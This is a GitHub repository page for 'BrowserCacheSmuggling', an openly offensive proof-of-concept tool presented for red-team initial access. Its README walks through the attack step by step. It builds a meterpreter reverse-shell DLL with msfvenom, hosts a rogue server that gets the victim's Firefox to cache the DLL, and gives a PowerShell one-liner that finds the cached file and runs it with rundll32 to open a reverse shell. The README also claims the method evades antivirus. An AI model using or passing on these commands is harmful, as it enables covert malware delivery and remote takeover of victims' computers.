Skip to content

This repository is all about the POC and Tools that can be leveraged down for initial access in red teaming engagements.

Notifications You must be signed in to change notification settings

surya-dev-singh/BrowserCacheSmuggling

Repository files navigation

Browser cache smuggling Attack

  • This repository is all about the POC that can be leveraged down for initial access in red teaming engagements.
  • This has the capabilities to bypass AV , depends on from where DLL is generated !!
  • This Repo is in development , we will be adding more module for Brave & Chrome Browser soon....

Theory Behind it :

How to Execute it ?

Step 1 :

Git Clone the URL & install the dependency : pip3 install -r requirements.txt also make sure Nginx is installed on the machine

Step 2:

create your malicious DLL file , from your favorite C2 server . example : msfvenom -p /windows/x64/meterpreter/reverse_tcp LHOST=<localip> LPORT=<local_port> -f dll -o malicious.dll and configure your listener accordingly .

Step 3:

Host you rouge Server that coerce browser to Cache The response.

python3 browsercachesmuggling.py --dll /root/smugglers.dll <malicious_dll>

Step 4:

Once Our data is begin cache , we can now run the following command on victim PC like so:

foreach ($files in @("$env:LOCALAPPDATA\Mozilla\Firefox\Profiles\*.default-release\cache2\entries\")) {Get-ChildItem $files -Recurse | ForEach-Object {if (Select-String -Pattern "ENTRYPOINT" -Path $_.FullName) {$dllPath = $_.FullName + '.'; rundll32.exe $dllPath,MainDll}}}

NOTE: From the above command , make sure when u are running the dll file from rundll32 , you provide proper entry point eg (MainDLL) , which may be different for havoc C2. and we will get our reverse shell !!

About

This repository is all about the POC and Tools that can be leveraged down for initial access in red teaming engagements.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published